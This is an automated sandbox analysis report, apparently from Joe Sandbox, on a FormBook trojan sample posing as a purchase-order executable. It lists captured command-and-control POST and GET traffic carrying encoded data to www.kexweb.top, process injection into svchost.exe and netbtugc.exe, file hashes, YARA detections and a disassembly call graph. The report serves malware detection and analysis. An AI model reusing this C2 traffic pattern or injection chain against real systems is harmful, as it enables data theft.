              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:33.815227985 CEST1852OUTPOST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 79 52 66 4f 68 70 59 54 6c 4b 67 49 62 38 79 71 32 64 4e 66 42 47 77 32 41 4d 41 79 45 49 76 4a 32 73 73 37 33 48 73 36 46 48 73 58 71 59 34 36 35 56 51 35 44 31 73 33 4b 4d 58 64 75 52 78 38 2b 58 6b 56 4b 2b 32 38 5a 73 46 63 2b 34 34 2f 44 5a 31 67 33 65 69 78 43 4b 43 68 78 72 33 67 78 2f 65 62 35 66 37 6f 45 59 50 71 51 4e 66 68 42 77 4d 36 4c 51 72 50 74 4b 61 47 64 47 6e 4d 2f 51 34 63 5a 72 4d 6c 55 59 67 58 57 34 62 66 76 67 2f 47 4e 2f 59 78 62 58 31 6b 45 4d 74 79 30 31 [TRUNCATED]
              Data Ascii: H0QP6=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267PibyRfOhpYTlKgIb8yq2dNfBGw2AMAyEIvJ2ss73Hs6FHsXqY465VQ5D1s3KMXduRx8+XkVK+28ZsFc+44/DZ1g3eixCKChxr3gx/eb5f7oEYPqQNfhBwM6LQrPtKaGdGnM/Q4cZrMlUYgXW4bfvg/GN/YxbX1kEMty01qsxIDS+OKENMZ97xavDtYkjIqIn96241FYVqGPNNO+dt9/1CVkKpiIwi3onLyuHbMrdseCLzyyZkkv9eQOVEGqAnPp7rdQRYEYEurFolPApcZwCRsQTC5WpOeyqFwAtnzXbLJzHsRRD1+xv2xTFIjm99W7FWPAz3s7JtHwa62gM0Xp6qehOwqXMiaqjPQ0yNdGhGs59q2l0343q2Ldmeg7S0GmqXMYujt9RndM+T3x4ZRfjSVr3KZ8JyORigimJSfo4Nyk5Wx1GOZVjduFJK5c7QPHMysRuqe2AQtBoKtYHeWkoPf4Kgpg+uxJ2SXsvl+kLw94oRKmlbyJvmlkfwRZpUVTrs7f1wUw1ytuH33U79O0p8/Av5qFlZqtVCbInRbI2ktaM43Jxw7hEI68iQTDiNtIGzYlNm4U9toyMHHgSP2V0TjmPq60NvR7q21m9Wd+LwHY0oiE+2U4qXjfeKqLMUfBJLARGAnYdqbfPolOacXAqheS06ocbhoYpDTgvvefF6SDHdgVjdXyBgpyzzRNNxLUuqI+F2+khCAJUreUtX+cfj5yI28QYze8rIFRQvcRKvdh/C6OKXWd3xSAv/p2cgGDLTKW6dJr3ASegVDrR+rU4IgCX8ES6RbqXfu7bTRBQO38McwrBQ/1TBpf3A9vzEBnRh4PI9hd [TRUNCATED]
              Sep 22, 2024 17:36:34.392795086 CEST595INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:34 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.74973063.250.47.40805424C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:36:36.754654884 CEST561OUTGET /3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:36:37.347039938 CEST610INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:37 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:11:34:31
              Start date:22/09/2024
              Path:C:\Users\user\Desktop\PO# Q919240.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\PO# Q919240.exe"
              Imagebase:0x400000
              File size:1'412'827 bytes
              MD5 hash:1CDBBC595757EA5F6E9393D622D66E10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:2
              Start time:11:34:32
              Start date:22/09/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\PO# Q919240.exe"
              Imagebase:0xb50000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:11:34:44
              Start date:22/09/2024
              Path:C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe"
              Imagebase:0x5e0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              General

              Target ID:5
              Start time:11:34:47
              Start date:22/09/2024
              Path:C:\Windows\SysWOW64\netbtugc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
              Imagebase:0xce0000
              File size:22'016 bytes
              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              General

              Target ID:6
              Start time:11:35:00
              Start date:22/09/2024
              Path:C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe"
              Imagebase:0x5e0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              General

              Target ID:10
              Start time:11:35:23
              Start date:22/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff722870000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:3.3%
                Dynamic/Decrypted Code Coverage:0.9%
                Signature Coverage:4.2%
                Total number of Nodes:1896
                Total number of Limit Nodes:36
                execution_graph 86124 4010e0 86127 401100 86124->86127 86126 4010f8 86128 401113 86127->86128 86129 401182 86128->86129 86130 401120 86128->86130 86131 401184 86128->86131 86132 40114c 86128->86132 86133 40112c DefWindowProcW 86129->86133 86130->86133 86172 401000 Shell_NotifyIconW __setmbcp_nolock 86130->86172 86165 401250 61 API calls __setmbcp_nolock 86131->86165 86134 401151 86132->86134 86135 40119d 86132->86135 86133->86126 86137 401219 86134->86137 86138 40115d 86134->86138 86140 4011a3 86135->86140 86141 42afb4 86135->86141 86137->86130 86144 401225 86137->86144 86142 401163 86138->86142 86143 42b01d 86138->86143 86139 401193 86139->86126 86140->86130 86147 4011b6 KillTimer 86140->86147 86148 4011db SetTimer RegisterWindowMessageW 86140->86148 86167 40f190 10 API calls 86141->86167 86149 42afe9 86142->86149 86150 40116c 86142->86150 86143->86133 86171 4370f4 52 API calls 86143->86171 86174 468b0e 74 API calls __setmbcp_nolock 86144->86174 86166 401000 Shell_NotifyIconW __setmbcp_nolock 86147->86166 86148->86139 86154 401204 CreatePopupMenu 86148->86154 86169 40f190 10 API calls 86149->86169 86150->86130 86156 401174 86150->86156 86151 42b04f 86173 40e0c0 74 API calls __setmbcp_nolock 86151->86173 86154->86126 86168 45fd57 65 API calls __setmbcp_nolock 86156->86168 86159 42afe4 86159->86139 86160 42b00e 86170 401a50 338 API calls 86160->86170 86161 4011c9 PostQuitMessage 86161->86126 86164 42afdc 86164->86133 86164->86159 86165->86139 86166->86161 86167->86139 86168->86164 86169->86160 86170->86129 86171->86129 86172->86151 86173->86129 86174->86159 86175 40bd20 86176 428194 86175->86176 86177 40bd2d 86175->86177 86179 40bd43 86176->86179 86181 4281bc 86176->86181 86182 4281b2 86176->86182 86178 40bd37 86177->86178 86198 4531b1 85 API calls 5 library calls 86177->86198 86187 40bd50 86178->86187 86197 45e987 86 API calls moneypunct 86181->86197 86196 40b510 VariantClear 86182->86196 86186 4281ba 86188 426cf1 86187->86188 86189 40bd63 86187->86189 86208 44cde9 52 API calls _memmove 86188->86208 86199 40bd80 86189->86199 86192 40bd73 86192->86179 86193 426cfc 86209 40e0a0 86193->86209 86195 426d02 86196->86186 86197->86177 86198->86178 86200 40bd8e 86199->86200 86201 40bdb7 _memmove 86199->86201 86200->86201 86202 40bded 86200->86202 86203 40bdad 86200->86203 86201->86192 86219 4115d7 86202->86219 86213 402f00 86203->86213 86207 4115d7 52 API calls 86207->86201 86208->86193 86210 40e0b2 86209->86210 86211 40e0a8 86209->86211 86210->86195 86253 403c30 52 API calls _memmove 86211->86253 86214 402f0c 86213->86214 86215 402f10 86213->86215 86214->86201 86216 4115d7 52 API calls 86215->86216 86217 4268c3 86215->86217 86218 402f51 moneypunct _memmove 86216->86218 86218->86201 86221 4115e1 _malloc 86219->86221 86222 40bdf6 86221->86222 86223 4115fd std::exception::exception 86221->86223 86230 4135bb 86221->86230 86222->86201 86222->86207 86224 41163b 86223->86224 86244 41130a 51 API calls __cinit 86223->86244 86245 4180af 46 API calls std::exception::operator= 86224->86245 86226 411645 86246 418105 RaiseException 86226->86246 86229 411656 86231 413638 _malloc 86230->86231 86241 4135c9 _malloc 86230->86241 86252 417f77 46 API calls __getptd_noexit 86231->86252 86232 4135d4 86232->86241 86247 418901 46 API calls 2 library calls 86232->86247 86248 418752 46 API calls 8 library calls 86232->86248 86249 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86232->86249 86235 4135f7 RtlAllocateHeap 86236 413630 86235->86236 86235->86241 86236->86221 86238 413624 86250 417f77 46 API calls __getptd_noexit 86238->86250 86241->86232 86241->86235 86241->86238 86242 413622 86241->86242 86251 417f77 46 API calls __getptd_noexit 86242->86251 86244->86224 86245->86226 86246->86229 86247->86232 86248->86232 86250->86242 86251->86236 86252->86236 86253->86210 86254 425ba2 86259 40e360 86254->86259 86256 425bb4 86275 41130a 51 API calls __cinit 86256->86275 86258 425bbe 86260 4115d7 52 API calls 86259->86260 86261 40e3ec GetModuleFileNameW 86260->86261 86276 413a0e 86261->86276 86263 40e421 _wcsncat 86279 413a9e 86263->86279 86266 4115d7 52 API calls 86267 40e45e _wcscpy 86266->86267 86282 40bc70 86267->86282 86271 40e4a9 86271->86256 86272 401c90 52 API calls 86274 40e4a1 _wcscat _wcslen _wcsncpy 86272->86274 86273 4115d7 52 API calls 86273->86274 86274->86271 86274->86272 86274->86273 86275->86258 86301 413801 86276->86301 86331 419efd 86279->86331 86283 4115d7 52 API calls 86282->86283 86284 40bc98 86283->86284 86285 4115d7 52 API calls 86284->86285 86286 40bca6 86285->86286 86287 40e4c0 86286->86287 86343 403350 86287->86343 86289 40e4cb RegOpenKeyExW 86290 427190 RegQueryValueExW 86289->86290 86291 40e4eb 86289->86291 86292 4271b0 86290->86292 86293 42721a RegCloseKey 86290->86293 86291->86274 86294 4115d7 52 API calls 86292->86294 86293->86274 86295 4271cb 86294->86295 86350 43652f 52 API calls 86295->86350 86297 4271d8 RegQueryValueExW 86298 42720e 86297->86298 86299 4271f7 86297->86299 86298->86293 86351 402160 86299->86351 86302 41389e 86301->86302 86306 41381a 86301->86306 86303 4139e8 86302->86303 86305 413a00 86302->86305 86328 417f77 46 API calls __getptd_noexit 86303->86328 86330 417f77 46 API calls __getptd_noexit 86305->86330 86306->86302 86316 41388a 86306->86316 86323 419e30 46 API calls __fptostr 86306->86323 86307 4139ed 86329 417f25 10 API calls __fptostr 86307->86329 86311 41396c 86311->86302 86312 413967 86311->86312 86314 41397a 86311->86314 86312->86263 86313 413929 86313->86302 86315 413945 86313->86315 86325 419e30 46 API calls __fptostr 86313->86325 86327 419e30 46 API calls __fptostr 86314->86327 86315->86302 86315->86312 86319 41395b 86315->86319 86316->86302 86322 413909 86316->86322 86324 419e30 46 API calls __fptostr 86316->86324 86326 419e30 46 API calls __fptostr 86319->86326 86322->86311 86322->86313 86323->86316 86324->86322 86325->86315 86326->86312 86327->86312 86328->86307 86329->86312 86330->86312 86332 419f13 86331->86332 86333 419f0e 86331->86333 86340 417f77 46 API calls __getptd_noexit 86332->86340 86333->86332 86339 419f2b 86333->86339 86335 419f18 86341 417f25 10 API calls __fptostr 86335->86341 86337 40e454 86337->86266 86339->86337 86342 417f77 46 API calls __getptd_noexit 86339->86342 86340->86335 86341->86337 86342->86335 86344 403367 86343->86344 86345 403358 86343->86345 86346 4115d7 52 API calls 86344->86346 86345->86289 86347 403370 86346->86347 86348 4115d7 52 API calls 86347->86348 86349 40339e 86348->86349 86349->86289 86350->86297 86352 426daa 86351->86352 86353 40216b _wcslen 86351->86353 86366 40c600 86352->86366 86356 402180 86353->86356 86357 40219e 86353->86357 86355 426db5 86355->86298 86364 403bd0 52 API calls moneypunct 86356->86364 86365 4013a0 52 API calls 86357->86365 86360 402187 _memmove 86360->86298 86361 4021a5 86362 426db7 86361->86362 86363 4115d7 52 API calls 86361->86363 86363->86360 86364->86360 86365->86361 86367 40c619 86366->86367 86368 40c60a 86366->86368 86367->86355 86368->86367 86371 4026f0 86368->86371 86370 426d7a _memmove 86370->86355 86372 426873 86371->86372 86373 4026ff 86371->86373 86378 4013a0 52 API calls 86372->86378 86373->86370 86375 42687b 86376 4115d7 52 API calls 86375->86376 86377 42689e _memmove 86376->86377 86377->86370 86378->86375 86379 416454 86416 416c70 86379->86416 86381 416460 GetStartupInfoW 86382 416474 86381->86382 86417 419d5a HeapCreate 86382->86417 86384 4164cd 86385 4164d8 86384->86385 86501 41642b 46 API calls 3 library calls 86384->86501 86418 417c20 GetModuleHandleW 86385->86418 86388 4164de 86389 4164e9 __RTC_Initialize 86388->86389 86502 41642b 46 API calls 3 library calls 86388->86502 86437 41aaa1 GetStartupInfoW 86389->86437 86393 416503 GetCommandLineW 86450 41f584 GetEnvironmentStringsW 86393->86450 86396 416513 86456 41f4d6 GetModuleFileNameW 86396->86456 86399 41651d 86400 416528 86399->86400 86504 411924 46 API calls 3 library calls 86399->86504 86460 41f2a4 86400->86460 86403 41652e 86404 416539 86403->86404 86505 411924 46 API calls 3 library calls 86403->86505 86474 411703 86404->86474 86407 416541 86409 41654c __wwincmdln 86407->86409 86506 411924 46 API calls 3 library calls 86407->86506 86478 40d6b0 86409->86478 86412 41657c 86508 411906 46 API calls _doexit 86412->86508 86415 416581 __mtinitlocknum 86416->86381 86417->86384 86419 417c34 86418->86419 86420 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86418->86420 86509 4178ff 49 API calls _free 86419->86509 86422 417c87 TlsAlloc 86420->86422 86425 417cd5 TlsSetValue 86422->86425 86426 417d96 86422->86426 86423 417c39 86423->86388 86425->86426 86427 417ce6 __init_pointers 86425->86427 86426->86388 86510 418151 InitializeCriticalSectionAndSpinCount 86427->86510 86429 417d91 86518 4178ff 49 API calls _free 86429->86518 86431 417d2a 86431->86429 86511 416b49 86431->86511 86434 417d76 86517 41793c 46 API calls 4 library calls 86434->86517 86436 417d7e GetCurrentThreadId 86436->86426 86438 416b49 __calloc_crt 46 API calls 86437->86438 86440 41aabf 86438->86440 86439 4164f7 86439->86393 86503 411924 46 API calls 3 library calls 86439->86503 86440->86439 86441 41ac34 86440->86441 86444 416b49 __calloc_crt 46 API calls 86440->86444 86446 41abb4 86440->86446 86442 41ac6a GetStdHandle 86441->86442 86443 41acce SetHandleCount 86441->86443 86445 41ac7c GetFileType 86441->86445 86449 41aca2 InitializeCriticalSectionAndSpinCount 86441->86449 86442->86441 86443->86439 86444->86440 86445->86441 86446->86441 86447 41abe0 GetFileType 86446->86447 86448 41abeb InitializeCriticalSectionAndSpinCount 86446->86448 86447->86446 86447->86448 86448->86439 86448->86446 86449->86439 86449->86441 86451 41f595 86450->86451 86452 41f599 86450->86452 86451->86396 86528 416b04 86452->86528 86454 41f5c2 FreeEnvironmentStringsW 86454->86396 86455 41f5bb _memmove 86455->86454 86457 41f50b _wparse_cmdline 86456->86457 86458 416b04 __malloc_crt 46 API calls 86457->86458 86459 41f54e _wparse_cmdline 86457->86459 86458->86459 86459->86399 86461 41f2bc _wcslen 86460->86461 86465 41f2b4 86460->86465 86462 416b49 __calloc_crt 46 API calls 86461->86462 86467 41f2e0 _wcslen 86462->86467 86463 41f336 86535 413748 86463->86535 86465->86403 86466 416b49 __calloc_crt 46 API calls 86466->86467 86467->86463 86467->86465 86467->86466 86468 41f35c 86467->86468 86471 41f373 86467->86471 86534 41ef12 46 API calls __fptostr 86467->86534 86470 413748 _free 46 API calls 86468->86470 86470->86465 86541 417ed3 86471->86541 86473 41f37f 86473->86403 86475 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86474->86475 86477 411750 __IsNonwritableInCurrentImage 86475->86477 86560 41130a 51 API calls __cinit 86475->86560 86477->86407 86479 42e2f3 86478->86479 86480 40d6cc 86478->86480 86561 408f40 86480->86561 86482 40d707 86565 40ebb0 86482->86565 86485 40d737 86568 411951 86485->86568 86490 40d751 86580 40f4e0 SystemParametersInfoW SystemParametersInfoW 86490->86580 86492 40d75f 86581 40d590 GetCurrentDirectoryW 86492->86581 86494 40d767 SystemParametersInfoW 86495 40d794 86494->86495 86496 40d78d FreeLibrary 86494->86496 86497 408f40 VariantClear 86495->86497 86496->86495 86498 40d79d 86497->86498 86499 408f40 VariantClear 86498->86499 86500 40d7a6 86499->86500 86500->86412 86507 4118da 46 API calls _doexit 86500->86507 86501->86385 86502->86389 86507->86412 86508->86415 86509->86423 86510->86431 86513 416b52 86511->86513 86514 416b8f 86513->86514 86515 416b70 Sleep 86513->86515 86519 41f677 86513->86519 86514->86429 86514->86434 86516 416b85 86515->86516 86516->86513 86516->86514 86517->86436 86518->86426 86520 41f683 86519->86520 86526 41f69e _malloc 86519->86526 86521 41f68f 86520->86521 86520->86526 86527 417f77 46 API calls __getptd_noexit 86521->86527 86523 41f6b1 HeapAlloc 86525 41f6d8 86523->86525 86523->86526 86524 41f694 86524->86513 86525->86513 86526->86523 86526->86525 86527->86524 86531 416b0d 86528->86531 86529 4135bb _malloc 45 API calls 86529->86531 86530 416b43 86530->86455 86531->86529 86531->86530 86532 416b24 Sleep 86531->86532 86533 416b39 86532->86533 86533->86530 86533->86531 86534->86467 86536 413753 RtlFreeHeap 86535->86536 86540 41377c __dosmaperr 86535->86540 86537 413768 86536->86537 86536->86540 86544 417f77 46 API calls __getptd_noexit 86537->86544 86539 41376e GetLastError 86539->86540 86540->86465 86545 417daa 86541->86545 86544->86539 86546 417dc9 __setmbcp_nolock __call_reportfault 86545->86546 86547 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86546->86547 86548 417eb5 __call_reportfault 86547->86548 86551 41a208 86548->86551 86550 417ed1 GetCurrentProcess TerminateProcess 86550->86473 86552 41a210 86551->86552 86553 41a212 IsDebuggerPresent 86551->86553 86552->86550 86559 41fe19 86553->86559 86556 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86557 421ff0 __call_reportfault 86556->86557 86558 421ff8 GetCurrentProcess TerminateProcess 86556->86558 86557->86558 86558->86550 86559->86556 86560->86477 86562 408f48 moneypunct 86561->86562 86563 4265c7 VariantClear 86562->86563 86564 408f55 moneypunct 86562->86564 86563->86564 86564->86482 86621 40ebd0 86565->86621 86625 4182cb 86568->86625 86570 41195e 86632 4181f2 LeaveCriticalSection 86570->86632 86572 40d748 86573 4119b0 86572->86573 86574 4119d6 86573->86574 86575 4119bc 86573->86575 86574->86490 86575->86574 86667 417f77 46 API calls __getptd_noexit 86575->86667 86577 4119c6 86668 417f25 10 API calls __fptostr 86577->86668 86579 4119d1 86579->86490 86580->86492 86669 401f20 86581->86669 86583 40d5b6 IsDebuggerPresent 86584 40d5c4 86583->86584 86585 42e1bb MessageBoxA 86583->86585 86586 42e1d4 86584->86586 86587 